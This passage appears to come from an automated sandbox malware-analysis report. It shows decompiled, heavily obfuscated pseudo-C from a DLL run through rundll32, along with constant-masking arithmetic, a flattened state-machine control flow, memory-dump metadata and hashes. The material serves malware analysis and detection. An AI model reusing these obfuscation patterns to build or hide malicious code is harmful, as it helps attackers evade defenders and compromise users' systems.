                                                                        				_v1820 = _v1820 ^ 0xbf29f1c0;
                                                                        				_v1644 = 0x87c;
                                                                        				_v1644 = _v1644 << 4;
                                                                        				_v1644 = _v1644 ^ 0x00008950;
                                                                        				_v1656 = 0xaf72;
                                                                        				_v1656 = _v1656 ^ 0xf8536856;
                                                                        				_v1656 = _v1656 ^ 0xf853f78b;
                                                                        				_v1720 = 0x2378;
                                                                        				_t653 = 0x12;
                                                                        				_v1720 = _v1720 * 0x77;
                                                                        				_v1720 = _v1720 ^ 0x64312f2b;
                                                                        				_v1720 = _v1720 ^ 0x642133c7;
                                                                        				_v1804 = 0xea19;
                                                                        				_v1804 = _v1804 + 0xffff5808;
                                                                        				_v1804 = _v1804 << 0x10;
                                                                        				_v1804 = _v1804 * 0x6f;
                                                                        				_v1804 = _v1804 ^ 0xac4f53f6;
                                                                        				_v1748 = 0x9778;
                                                                        				_v1748 = _v1748 << 7;
                                                                        				_v1748 = _v1748 ^ 0x598ba3f9;
                                                                        				_v1748 = _v1748 + 0x8ff6;
                                                                        				_v1748 = _v1748 ^ 0x59c0ab27;
                                                                        				_v1664 = 0x881f;
                                                                        				_v1664 = _v1664 >> 0xa;
                                                                        				_v1664 = _v1664 | 0x5b999195;
                                                                        				_v1664 = _v1664 ^ 0x5b999b93;
                                                                        				_v1728 = 0x74b1;
                                                                        				_v1728 = _v1728 ^ 0x6074f824;
                                                                        				_v1728 = _v1728 >> 0xd;
                                                                        				_v1728 = _v1728 ^ 0x00031884;
                                                                        				_v1628 = 0x3039;
                                                                        				_v1628 = _v1628 / _t653;
                                                                        				_v1628 = _v1628 ^ 0x00006384;
                                                                        				_v1736 = 0xc64f;
                                                                        				_t654 = 0x5c;
                                                                        				_v1736 = _v1736 / _t654;
                                                                        				_v1736 = _v1736 | 0xd5a0b868;
                                                                        				_v1736 = _v1736 ^ 0xd5a0f550;
                                                                        				_v1724 = 0xb856;
                                                                        				_v1724 = _v1724 + 0x47b5;
                                                                        				_v1724 = _v1724 * 0x2a;
                                                                        				_v1724 = _v1724 ^ 0x002a3a18;
                                                                        				_v1824 = 0x8351;
                                                                        				_v1824 = _v1824 + 0x81f5;
                                                                        				_v1824 = _v1824 + 0xe517;
                                                                        				_v1824 = _v1824 << 2;
                                                                        				_v1824 = _v1824 ^ 0x0007a51f;
                                                                        				_v1740 = 0xf66b;
                                                                        				_v1740 = _v1740 + 0xffff1308;
                                                                        				_v1740 = _v1740 << 6;
                                                                        				_v1740 = _v1740 ^ 0x0002750a;
                                                                        				_v1792 = 0x9fd9;
                                                                        				_v1792 = _v1792 + 0x4b8e;
                                                                        				_v1792 = _v1792 + 0xffff2f9e;
                                                                        				_v1792 = _v1792 >> 0xf;
                                                                        				_v1792 = _v1792 ^ 0x00003a08;
                                                                        				_v1800 = 0x966c;
                                                                        				_v1800 = _v1800 ^ 0x8d45c2e0;
                                                                        				_v1800 = _v1800 ^ 0x65a85158;
                                                                        				_v1800 = _v1800 + 0xffff603c;
                                                                        				_v1800 = _v1800 ^ 0xe8ec61cf;
                                                                        				_v1716 = 0x4029;
                                                                        				_t655 = 0x60;
                                                                        				_v1716 = _v1716 / _t655;
                                                                        				_v1716 = _v1716 ^ 0x86a261cb;
                                                                        				_v1716 = _v1716 ^ 0x86a2059f;
                                                                        				_v1808 = 0xe8e3;
                                                                        				_v1808 = _v1808 / _t731;
                                                                        				_v1808 = _v1808 + 0x483f;
                                                                        				_v1808 = _v1808 ^ 0xbcef0a4e;
                                                                        				_v1808 = _v1808 ^ 0xbcef6349;
                                                                        				_v1816 = 0x6f91;
                                                                        				_v1816 = _v1816 + 0xffff8468;
                                                                        				_t732 = 0x34;
                                                                        				_t656 = 0x29;
                                                                        				_v1816 = _v1816 * 0x33;
                                                                        				_v1816 = _v1816 << 7;
                                                                        				_v1816 = _v1816 ^ 0xfecd495c;
                                                                        				_v1640 = 0xa61;
                                                                        				_v1640 = _v1640 >> 0xd;
                                                                        				_v1640 = _v1640 ^ 0x00004d64;
                                                                        				_v1648 = 0x609b;
                                                                        				_v1648 = _v1648 + 0xae34;
                                                                        				_v1648 = _v1648 ^ 0x00012005;
                                                                        				_v1616 = 0x313f;
                                                                        				_v1616 = _v1616 + 0xf40e;
                                                                        				_v1616 = _v1616 ^ 0x0001621e;
                                                                        				_v1680 = 0xad27;
                                                                        				_v1680 = _v1680 ^ 0x11741994;
                                                                        				_v1680 = _v1680 ^ 0x828bebc7;
                                                                        				_v1680 = _v1680 ^ 0x93ff4a0d;
                                                                        				_v1704 = 0x2eca;
                                                                        				_v1704 = _v1704 << 3;
                                                                        				_v1704 = _v1704 + 0xffff4fca;
                                                                        				_v1704 = _v1704 ^ 0x0000afdc;
                                                                        				_v1672 = 0xb5e9;
                                                                        				_v1672 = _v1672 / _t732;
                                                                        				_v1672 = _v1672 | 0x3cbbe239;
                                                                        				_v1672 = _v1672 ^ 0x3cbbda4d;
                                                                        				_v1760 = 0x653d;
                                                                        				_v1760 = _v1760 ^ 0x5e29d2db;
                                                                        				_v1760 = _v1760 / _t656;
                                                                        				_v1760 = _v1760 * 0x30;
                                                                        				_v1760 = _v1760 ^ 0x6e3d0fd3;
                                                                        				_v1768 = 0xee4d;
                                                                        				_v1768 = _v1768 + 0xffff4943;
                                                                        				_v1768 = _v1768 * 0x23;
                                                                        				_v1768 = _v1768 | 0x6650922d;
                                                                        				_v1768 = _v1768 ^ 0x6657f47d;
                                                                        				_v1620 = 0x4442;
                                                                        				_v1620 = _v1620 << 0xa;
                                                                        				_v1620 = _v1620 ^ 0x01114709;
                                                                        				_v1752 = 0x70f3;
                                                                        				_v1752 = _v1752 + 0xc573;
                                                                        				_v1752 = _v1752 ^ 0x8bd692b9;
                                                                        				_v1752 = _v1752 + 0x375f;
                                                                        				_v1752 = _v1752 ^ 0x8bd7cab9;
                                                                        				_v1692 = 0x8d49;
                                                                        				_v1692 = _v1692 | 0xadf95343;
                                                                        				_t657 = 0x6f;
                                                                        				_v1692 = _v1692 / _t657;
                                                                        				_v1692 = _v1692 ^ 0x01915aad;
                                                                        				_v1608 = 0x9445;
                                                                        				_v1608 = _v1608 ^ 0xfa8556cd;
                                                                        				_v1608 = _v1608 ^ 0xfa8587ad;
                                                                        				_v1596 = 0xa356;
                                                                        				_v1596 = _v1596 ^ 0x020e3d0f;
                                                                        				_v1596 = _v1596 ^ 0x020eaa39;
                                                                        				_v1668 = 0x9fc9;
                                                                        				_v1668 = _v1668 << 1;
                                                                        				_v1668 = _v1668 + 0xffff5705;
                                                                        				_v1668 = _v1668 ^ 0x0000873c;
                                                                        				_v1676 = 0x5aa4;
                                                                        				_t658 = 0x57;
                                                                        				_v1676 = _v1676 * 0xd;
                                                                        				_t659 = 0x74;
                                                                        				_v1676 = _v1676 / _t658;
                                                                        				_v1676 = _v1676 ^ 0x000044cc;
                                                                        				_v1684 = 0x6a20;
                                                                        				_v1684 = _v1684 << 5;
                                                                        				_v1684 = _v1684 + 0xffff5b62;
                                                                        				_v1684 = _v1684 ^ 0x000ca81d;
                                                                        				_v1652 = 0xc97c;
                                                                        				_v1652 = _v1652 >> 5;
                                                                        				_v1652 = _v1652 ^ 0x00002e12;
                                                                        				_v1696 = 0x481c;
                                                                        				_v1696 = _v1696 << 5;
                                                                        				_v1696 = _v1696 << 0xf;
                                                                        				_v1696 = _v1696 ^ 0x81c0713e;
                                                                        				_v1732 = 0x6e12;
                                                                        				_v1732 = _v1732 + 0x239d;
                                                                        				_v1732 = _v1732 << 0xe;
                                                                        				_v1732 = _v1732 ^ 0x246bc9a9;
                                                                        				_v1812 = 0x8d84;
                                                                        				_v1812 = _v1812 << 7;
                                                                        				_v1812 = _v1812 ^ 0x627ea561;
                                                                        				_v1812 = _v1812 + 0xffffb69b;
                                                                        				_v1812 = _v1812 ^ 0x623827c0;
                                                                        				_v1612 = 0x2459;
                                                                        				_v1612 = _v1612 * 0x5f;
                                                                        				_v1612 = _v1612 ^ 0x000d4756;
                                                                        				_v1780 = 0x3738;
                                                                        				_v1780 = _v1780 >> 0xf;
                                                                        				_v1780 = _v1780 + 0x7756;
                                                                        				_t660 = 0x49;
                                                                        				_v1780 = _v1780 / _t659;
                                                                        				_v1780 = _v1780 ^ 0x00004d7c;
                                                                        				_v1604 = 0xa6e8;
                                                                        				_v1604 = _v1604 >> 0xb;
                                                                        				_v1604 = _v1604 ^ 0x00007121;
                                                                        				_v1700 = 0x3aaa;
                                                                        				_v1700 = _v1700 * 0x35;
                                                                        				_v1700 = _v1700 | 0x9258fa78;
                                                                        				_v1700 = _v1700 ^ 0x925ce803;
                                                                        				_v1776 = 0xc1a7;
                                                                        				_v1776 = _v1776 | 0xe727275b;
                                                                        				_t347 =  &_v1776; // 0xe727275b
                                                                        				_v1776 =  *_t347 / _t660;
                                                                        				_v1776 = _v1776 | 0x34b38de4;
                                                                        				_v1776 = _v1776 ^ 0x37bb8fe4;
                                                                        				_v1784 = 0x91c3;
                                                                        				_t661 = 0x64;
                                                                        				_v1784 = _v1784 / _t661;
                                                                        				_v1784 = _v1784 + 0x788e;
                                                                        				_v1784 = _v1784 / _t732;
                                                                        				_v1784 = _v1784 ^ 0x000026f9;
                                                                        				_v1756 = 0xe29b;
                                                                        				_v1756 = _v1756 << 5;
                                                                        				_v1756 = _v1756 >> 9;
                                                                        				_t662 = 0x21;
                                                                        				_v1756 = _v1756 / _t662;
                                                                        				_v1756 = _v1756 ^ 0x00004ef7;
                                                                        				_v1796 = 0x179;
                                                                        				_v1796 = _v1796 + 0x7a5c;
                                                                        				_v1796 = _v1796 | 0xddf9ffa6;
                                                                        				_v1796 = _v1796 ^ 0xddf99719;
                                                                        				_v1688 = 0xa45d;
                                                                        				_t663 = 0x17;
                                                                        				_v1688 = _v1688 / _t663;
                                                                        				_v1688 = _v1688 ^ 0xa9b19ce5;
                                                                        				_v1688 = _v1688 ^ 0xa9b19a72;
                                                                        				_v1772 = 0x6fb4;
                                                                        				_v1772 = _v1772 << 9;
                                                                        				_v1772 = _v1772 >> 0xb;
                                                                        				_v1772 = _v1772 >> 4;
                                                                        				_v1772 = _v1772 ^ 0x0000531d;
                                                                        				_v1636 = 0x1eab;
                                                                        				_v1636 = _v1636 | 0x295ec68a;
                                                                        				_v1636 = _v1636 ^ 0x295ec908;
                                                                        				_v1712 = 0x5da6;
                                                                        				_v1712 = _v1712 ^ 0x5fdaae01;
                                                                        				_v1712 = _v1712 ^ 0xdf7664b8;
                                                                        				_v1712 = _v1712 ^ 0x80ac9034;
                                                                        				_v1764 = 0x8aec;
                                                                        				_t664 = 0x4b;
                                                                        				_v1764 = _v1764 / _t664;
                                                                        				_t665 = 0x45;
                                                                        				_v1764 = _v1764 * 0x5a;
                                                                        				_v1764 = _v1764 * 0x7e;
                                                                        				_v1764 = _v1764 ^ 0x0052267c;
                                                                        				_v1788 = 0x22ed;
                                                                        				_v1788 = _v1788 + 0xffffcd0d;
                                                                        				_v1788 = _v1788 * 0x72;
                                                                        				_v1788 = _v1788 << 0xc;
                                                                        				_v1788 = _v1788 ^ 0x8dd516dd;
                                                                        				_v1744 = 0x24eb;
                                                                        				_v1744 = _v1744 ^ 0x0b5c0f43;
                                                                        				_v1744 = _v1744 ^ 0xa1a0b70d;
                                                                        				_v1744 = _v1744 / _t665;
                                                                        				_v1744 = _v1744 ^ 0x027a3009;
                                                                        				_v1624 = 0x7660;
                                                                        				_v1624 = _v1624 ^ 0x00000e09;
                                                                        				_v1632 = 0x758c;
                                                                        				_v1632 = _v1632 << 0xa;
                                                                        				_v1632 = _v1632 ^ 0x01d672ff;
                                                                        				_v1660 = 0x7b50;
                                                                        				_v1660 = _v1660 >> 1;
                                                                        				_v1660 = _v1660 >> 3;
                                                                        				_v1660 = _v1660 ^ 0x000037ef;
                                                                        				_v1708 = 0x99fa;
                                                                        				_v1708 = _v1708 ^ 0xe57d132d;
                                                                        				_v1708 = _v1708 ^ 0x77fb962a;
                                                                        				_v1708 = _v1708 ^ 0x92961cfd;
                                                                        				_t616 = E100145F8();
                                                                        				_t733 = _v1592;
                                                                        				_t739 = _t616;
                                                                        				_t651 = _v1592;
                                                                        				while(1) {
                                                                        					L1:
                                                                        					_t617 = 0x2cd60113;
                                                                        					do {
                                                                        						while(1) {
                                                                        							L2:
                                                                        							_t742 = _t734 - 0x1e5e78f1;
                                                                        							if(_t742 > 0) {
                                                                        								break;
                                                                        							}
                                                                        							if(_t742 == 0) {
                                                                        								_t636 = E1000D0DE(_v1584, _v1616, _v1680, _v1704, _v1672, _v1580);
                                                                        								_t651 = _t636;
                                                                        								_t740 = _t740 + 0x10;
                                                                        								__eflags = _t636;
                                                                        								_t617 = 0x2cd60113;
                                                                        								_t734 =  !=  ? 0x2cd60113 : 0x12daf843;
                                                                        								continue;
                                                                        							}
                                                                        							if(_t734 == 0x178ada5) {
                                                                        								 *((intOrPtr*)(_t733 + 0x20)) = _v1588;
                                                                        								_t638 =  *0x10021400; // 0x0
                                                                        								 *(_t733 + 0x10) = _t638;
                                                                        								 *0x10021400 = _t733;
                                                                        								return _t638;
                                                                        							}
                                                                        							if(_t734 == 0x2a95541) {
                                                                        								_t675 = _v1576;
                                                                        								E100078F0(_t675, _v1636, _v1712, _v1764, _v1788);
                                                                        								_t740 = _t740 + 0xc;
                                                                        								_t734 = 0x178ada5;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t617 = 0x2cd60113;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							if(_t734 == 0x12daf843) {
                                                                        								_t675 = _v1756;
                                                                        								E100091CD(_t675, _v1796, _v1688, _v1584, _v1772);
                                                                        								_t740 = _t740 + 0xc;
                                                                        								_t734 = 0x2a95541;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t617 = 0x2cd60113;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							if(_t734 != 0x149dffe6) {
                                                                        								if(_t734 == 0x178c8cba) {
                                                                        									_push( &_v1044);
                                                                        									E10002628(_v1588, _v1592);
                                                                        									asm("sbb esi, esi");
                                                                        									_t675 = 0x100012f8;
                                                                        									_t737 = _t734 & 0x16fb7084;
                                                                        									__eflags = _t737;
                                                                        									L12:
                                                                        									_t734 = _t737 + 0x22b4e350;
                                                                        									while(1) {
                                                                        										L1:
                                                                        										_t617 = 0x2cd60113;
                                                                        										goto L2;
                                                                        									}
                                                                        								} else {
                                                                        									_t748 = _t734 - 0x1a9938f9;
                                                                        									if(_t734 != 0x1a9938f9) {
                                                                        										goto L28;
                                                                        									} else {
                                                                        										_push(_v1780);
                                                                        										_push(1);
                                                                        										_push( &_v524);
                                                                        										_push(_t675);
                                                                        										_push(_v1612);
                                                                        										_push(_v1812);
                                                                        										_t675 = _v1696;
                                                                        										_push(0);
                                                                        										_push(0);
                                                                        										E100189F6(_t675, _v1732, _t748);
                                                                        										_t740 = _t740 + 0x20;
                                                                        										_t734 = 0x32f46056;
                                                                        										while(1) {
                                                                        											L1:
                                                                        											_t617 = 0x2cd60113;
                                                                        											goto L2;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							_t676 = 0x24;
                                                                        							_t643 = E100157E8(_t676);
                                                                        							_t733 = _t643;
                                                                        							_t675 = _t675;
                                                                        							__eflags = _t733;
                                                                        							if(_t733 != 0) {
                                                                        								_push(_t675);
                                                                        								E10001D54(_v1720, _t675, _v1804, _v1748, _v1664,  &_v1564, _v1728, _v1600);
                                                                        								_t740 = _t740 + 0x20;
                                                                        								_t734 = 0x178c8cba;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t617 = 0x2cd60113;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							return _t643;
                                                                        							L32:
                                                                        						}
                                                                        						__eflags = _t734 - 0x22b4e350;
                                                                        						if(_t734 == 0x22b4e350) {
                                                                        							E100091CD(_v1744, _v1624, _v1632, _t733, _v1660);
                                                                        							_t740 = _t740 + 0xc;
                                                                        							_t734 = 0xf568d32;
                                                                        							_t617 = 0x2cd60113;
                                                                        							goto L28;
                                                                        						} else {
                                                                        							__eflags = _t734 - 0x23197851;
                                                                        							if(_t734 == 0x23197851) {
                                                                        								E10011B71( &_v1576, _v1640,  &_v1584, _v1648);
                                                                        								asm("sbb esi, esi");
                                                                        								_t734 = (_t734 & 0x1bb523b0) + 0x2a95541;
                                                                        								goto L1;
                                                                        							} else {
                                                                        								__eflags = _t734 - _t617;
                                                                        								if(__eflags == 0) {
                                                                        									_push(0x100013a8);
                                                                        									_push(_v1620);
                                                                        									E100164EC(_t651, __eflags, E1001BF25(_v1760, _v1768, __eflags), _v1752, 0x104,  &_v1044,  &_v1564, _v1692, _v1608, _v1596);
                                                                        									E1001C5F7(_v1668, _v1676, _v1684, _v1652, _t622);
                                                                        									_t740 = _t740 + 0x34;
                                                                        									_t734 = 0x1a9938f9;
                                                                        									while(1) {
                                                                        										L1:
                                                                        										_t617 = 0x2cd60113;
                                                                        										goto L2;
                                                                        									}
                                                                        								} else {
                                                                        									__eflags = _t734 - 0x32f46056;
                                                                        									if(_t734 == 0x32f46056) {
                                                                        										E100091CD(_v1604, _v1700, _v1776, _t651, _v1784);
                                                                        										_t740 = _t740 + 0xc;
                                                                        										_t734 = 0x12daf843;
                                                                        										while(1) {
                                                                        											L1:
                                                                        											_t617 = 0x2cd60113;
                                                                        											goto L2;
                                                                        										}
                                                                        									} else {
                                                                        										__eflags = _t734 - 0x39b053d4;
                                                                        										if(_t734 != 0x39b053d4) {
                                                                        											goto L28;
                                                                        										} else {
                                                                        											_v1572 = E10009295();
                                                                        											_t631 = E1001BBAB(_v1724, _v1824, _t630, _v1740);
                                                                        											_pop(_t681);
                                                                        											_v1568 = 2 + _t631 * 2;
                                                                        											_t675 = _v1792;
                                                                        											E1001C353(_t675, _v1708, _v1800, _t739,  &_v1576, _t681, _v1716, _t681, _t739, _t739, _v1808, _v1816);
                                                                        											_t740 = _t740 + 0x28;
                                                                        											asm("sbb esi, esi");
                                                                        											_t737 = _t734 & 0x00649501;
                                                                        											goto L12;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L32;
                                                                        						L28:
                                                                        						__eflags = _t734 - 0xf568d32;
                                                                        					} while (__eflags != 0);
                                                                        					return _t617;
                                                                        				}
                                                                        			}





































































































                                                                        0x100132e9
                                                                        0x100132f4
                                                                        0x100132f6
                                                                        0x100132f7
                                                                        0x100132f8
                                                                        0x100132ff
                                                                        0x1001330a
                                                                        0x10013311
                                                                        0x10013313
                                                                        0x10013315
                                                                        0x1001331a
                                                                        0x1001331d
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x00000000
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x100132e3
                                                                        0x100132db
                                                                        0x1001336f
                                                                        0x10013370
                                                                        0x10013375
                                                                        0x10013377
                                                                        0x10013378
                                                                        0x1001337a
                                                                        0x10013380
                                                                        0x100133ab
                                                                        0x100133b0
                                                                        0x100133b3
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x00000000
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x10013658
                                                                        0x00000000
                                                                        0x10013658
                                                                        0x10013460
                                                                        0x10013466
                                                                        0x10013616
                                                                        0x1001361b
                                                                        0x1001361e
                                                                        0x10013623
                                                                        0x00000000
                                                                        0x1001346c
                                                                        0x1001346c
                                                                        0x10013472
                                                                        0x100135e0
                                                                        0x100135e8
                                                                        0x100135f1
                                                                        0x00000000
                                                                        0x10013478
                                                                        0x10013478
                                                                        0x1001347a
                                                                        0x1001353c
                                                                        0x10013541
                                                                        0x1001358f
                                                                        0x100135b1
                                                                        0x100135b6
                                                                        0x100135b9
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x00000000
                                                                        0x1001328e
                                                                        0x10013480
                                                                        0x10013480
                                                                        0x10013486
                                                                        0x1001352a
                                                                        0x1001352f
                                                                        0x10013532
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x1001328e
                                                                        0x00000000
                                                                        0x1001328e
                                                                        0x1001348c
                                                                        0x1001348c
                                                                        0x10013492
                                                                        0x00000000
                                                                        0x10013498
                                                                        0x100134b5
                                                                        0x100134bc
                                                                        0x100134c2
                                                                        0x100134d2
                                                                        0x100134f8
                                                                        0x100134fc
                                                                        0x10013501
                                                                        0x10013506
                                                                        0x10013508
                                                                        0x00000000
                                                                        0x10013508
                                                                        0x10013492
                                                                        0x10013486
                                                                        0x1001347a
                                                                        0x10013472
                                                                        0x00000000
                                                                        0x10013628
                                                                        0x10013628
                                                                        0x10013628
                                                                        0x00000000
                                                                        0x10013293

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FolderPath
                                                                        • String ID: j$!q$)@$+/1d$=e$?1$?H$BD$M$VG$Y$$[''$\z$_7$`v$dM$|&R$|M$"$$$7
                                                                        • API String ID: 1514166925-3565163747
                                                                        • Opcode ID: 9163a8007b0dceb48b04801531080e3a121e2b3b0e415cdbf67a5b480fcb8054
                                                                        • Instruction ID: 2b517cf3c11194d57aa6f79e2f665a47e465c6b4f990833d55609906dbc9d50d
                                                                        • Opcode Fuzzy Hash: 9163a8007b0dceb48b04801531080e3a121e2b3b0e415cdbf67a5b480fcb8054
                                                                        • Instruction Fuzzy Hash: 57520F715083818FE3B8CF61C54AB8BBBE1BBC4704F10891DE5D98A2A0D7B59949CF53
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 81%
                                                                        			E10004EA1(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                                        				char _v524;
                                                                        				char _v1044;
                                                                        				short _v1588;
                                                                        				short _v1590;
                                                                        				char _v1592;
                                                                        				signed int _v1636;
                                                                        				signed int _v1640;
                                                                        				intOrPtr _v1644;
                                                                        				signed int _v1648;
                                                                        				signed int _v1652;
                                                                        				signed int _v1656;
                                                                        				signed int _v1660;
                                                                        				signed int _v1664;
                                                                        				signed int _v1668;
                                                                        				signed int _v1672;
                                                                        				signed int _v1676;
                                                                        				signed int _v1680;
                                                                        				signed int _v1684;
                                                                        				signed int _v1688;
                                                                        				signed int _v1692;
                                                                        				signed int _v1696;
                                                                        				signed int _v1700;
                                                                        				signed int _v1704;
                                                                        				signed int _v1708;
                                                                        				signed int _v1712;
                                                                        				signed int _v1716;
                                                                        				signed int _v1720;
                                                                        				signed int _v1724;
                                                                        				signed int _v1728;
                                                                        				signed int _v1732;
                                                                        				signed int _v1736;
                                                                        				signed int _v1740;
                                                                        				signed int _v1744;
                                                                        				signed int _v1748;
                                                                        				signed int _v1752;
                                                                        				signed int _v1756;
                                                                        				signed int _v1760;
                                                                        				signed int _v1764;
                                                                        				signed int _v1768;
                                                                        				signed int _v1772;
                                                                        				signed int _v1776;
                                                                        				signed int _v1780;
                                                                        				signed int _v1784;
                                                                        				signed int _v1788;
                                                                        				signed int _v1792;
                                                                        				signed int _v1796;
                                                                        				signed int _v1800;
                                                                        				void* _t372;
                                                                        				signed int _t400;
                                                                        				signed int _t403;
                                                                        				void* _t404;
                                                                        				signed int _t407;
                                                                        				void* _t410;
                                                                        				void* _t416;
                                                                        				signed int _t420;
                                                                        				void* _t423;
                                                                        				void* _t429;
                                                                        				void* _t457;
                                                                        				signed int _t468;
                                                                        				signed int _t470;
                                                                        				signed int _t471;
                                                                        				signed int _t472;
                                                                        				signed int _t473;
                                                                        				signed int _t474;
                                                                        				signed int _t475;
                                                                        				signed int _t476;
                                                                        				signed int _t477;
                                                                        				void* _t480;
                                                                        				signed int* _t482;
                                                                        
                                                                        				_push(_a24);
                                                                        				_t480 = __ecx;
                                                                        				_push(_a20);
                                                                        				_push(_a16);
                                                                        				_push(_a12);
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t372);
                                                                        				_v1640 = _v1640 & 0x00000000;
                                                                        				_t482 =  &(( &_v1800)[8]);
                                                                        				_v1644 = 0x4bd480;
                                                                        				_v1780 = 0x9933;
                                                                        				_t416 = 0x363f5361;
                                                                        				_v1780 = _v1780 | 0xad73ff37;
                                                                        				_v1780 = _v1780 ^ 0x960b9a74;
                                                                        				_v1780 = _v1780 ^ 0x3b786553;
                                                                        				_v1784 = 0x542f;
                                                                        				_v1784 = _v1784 + 0xc8ce;
                                                                        				_v1784 = _v1784 + 0xffffa8c2;
                                                                        				_t468 = 0x5b;
                                                                        				_v1784 = _v1784 / _t468;
                                                                        				_v1784 = _v1784 ^ 0x00004f1f;
                                                                        				_v1760 = 0xa937;
                                                                        				_v1760 = _v1760 + 0xc6be;
                                                                        				_v1760 = _v1760 | 0x9e8a2caa;
                                                                        				_v1760 = _v1760 + 0xffff9fa2;
                                                                        				_v1760 = _v1760 ^ 0x9e8b35b0;
                                                                        				_v1792 = 0xa290;
                                                                        				_t470 = 0x63;
                                                                        				_v1792 = _v1792 * 0x38;
                                                                        				_v1792 = _v1792 + 0xffff655b;
                                                                        				_v1792 = _v1792 + 0xffff3f9a;
                                                                        				_v1792 = _v1792 ^ 0x00223804;
                                                                        				_v1740 = 0x49e2;
                                                                        				_v1740 = _v1740 >> 8;
                                                                        				_v1740 = _v1740 | 0xc414d990;
                                                                        				_v1740 = _v1740 ^ 0xc41493fb;
                                                                        				_v1800 = 0x74d9;
                                                                        				_t471 = 0x17;
                                                                        				_v1800 = _v1800 / _t470;
                                                                        				_v1800 = _v1800 ^ 0xc291bda4;
                                                                        				_v1800 = _v1800 + 0xeb6d;
                                                                        				_v1800 = _v1800 ^ 0xc292eb29;
                                                                        				_v1720 = 0x4d0b;
                                                                        				_v1720 = _v1720 << 7;
                                                                        				_v1720 = _v1720 + 0x277b;
                                                                        				_v1720 = _v1720 ^ 0x00268d74;
                                                                        				_v1768 = 0x75cf;
                                                                        				_v1768 = _v1768 * 0x62;
                                                                        				_v1768 = _v1768 + 0x1332;
                                                                        				_v1768 = _v1768 >> 0xd;
                                                                        				_v1768 = _v1768 ^ 0x00000ed4;
                                                                        				_v1692 = 0xd85d;
                                                                        				_v1692 = _v1692 + 0xd2aa;
                                                                        				_v1692 = _v1692 ^ 0x0001f663;
                                                                        				_v1788 = 0xbc3e;
                                                                        				_v1788 = _v1788 | 0x282d42cc;
                                                                        				_v1788 = _v1788 + 0xffffb4b2;
                                                                        				_v1788 = _v1788 * 0x25;
                                                                        				_v1788 = _v1788 ^ 0xce9a942b;
                                                                        				_v1796 = 0x301;
                                                                        				_v1796 = _v1796 ^ 0x0ec358c8;
                                                                        				_v1796 = _v1796 / _t471;
                                                                        				_v1796 = _v1796 + 0xffff6806;
                                                                        				_v1796 = _v1796 ^ 0x00a3cb1c;
                                                                        				_v1656 = 0xf49e;
                                                                        				_v1656 = _v1656 + 0xffffddef;
                                                                        				_v1656 = _v1656 ^ 0x0000aa95;
                                                                        				_v1728 = 0xf403;
                                                                        				_v1728 = _v1728 + 0x6a8e;
                                                                        				_v1728 = _v1728 << 6;
                                                                        				_v1728 = _v1728 ^ 0x0057d552;
                                                                        				_v1756 = 0x4f4e;
                                                                        				_v1756 = _v1756 + 0xffff0830;
                                                                        				_v1756 = _v1756 | 0xfc8d1ff5;
                                                                        				_v1756 = _v1756 >> 0xb;
                                                                        				_v1756 = _v1756 ^ 0x001fca39;
                                                                        				_v1680 = 0x60;
                                                                        				_v1680 = _v1680 >> 0xd;
                                                                        				_v1680 = _v1680 ^ 0x00002a5b;
                                                                        				_v1688 = 0xc18a;
                                                                        				_v1688 = _v1688 ^ 0xc8271709;
                                                                        				_v1688 = _v1688 ^ 0xc827be32;
                                                                        				_v1704 = 0xf8b0;
                                                                        				_v1704 = _v1704 << 6;
                                                                        				_v1704 = _v1704 ^ 0x003e063b;
                                                                        				_v1772 = 0x7a1e;
                                                                        				_v1772 = _v1772 ^ 0xc6946529;
                                                                        				_v1772 = _v1772 << 4;
                                                                        				_v1772 = _v1772 << 2;
                                                                        				_v1772 = _v1772 ^ 0xa507b562;
                                                                        				_v1744 = 0xe662;
                                                                        				_v1744 = _v1744 >> 5;
                                                                        				_v1744 = _v1744 | 0x81d50607;
                                                                        				_v1744 = _v1744 ^ 0x81d55403;
                                                                        				_v1716 = 0x2f94;
                                                                        				_v1716 = _v1716 / _t468;
                                                                        				_t472 = 0x2c;
                                                                        				_v1716 = _v1716 / _t472;
                                                                        				_v1716 = _v1716 ^ 0x00000a71;
                                                                        				_v1648 = 0xc69;
                                                                        				_v1648 = _v1648 + 0x3b27;
                                                                        				_v1648 = _v1648 ^ 0x00004de4;
                                                                        				_v1732 = 0x30eb;
                                                                        				_v1732 = _v1732 | 0x980f1189;
                                                                        				_t473 = 0x7e;
                                                                        				_v1732 = _v1732 * 0x3d;
                                                                        				_v1732 = _v1732 ^ 0x3b9ecce7;
                                                                        				_v1684 = 0xb64c;
                                                                        				_v1684 = _v1684 ^ 0x315bc1c3;
                                                                        				_v1684 = _v1684 ^ 0x315b57c4;
                                                                        				_v1724 = 0x6411;
                                                                        				_v1724 = _v1724 | 0xfbcd3fff;
                                                                        				_v1724 = _v1724 ^ 0xfbcd5420;
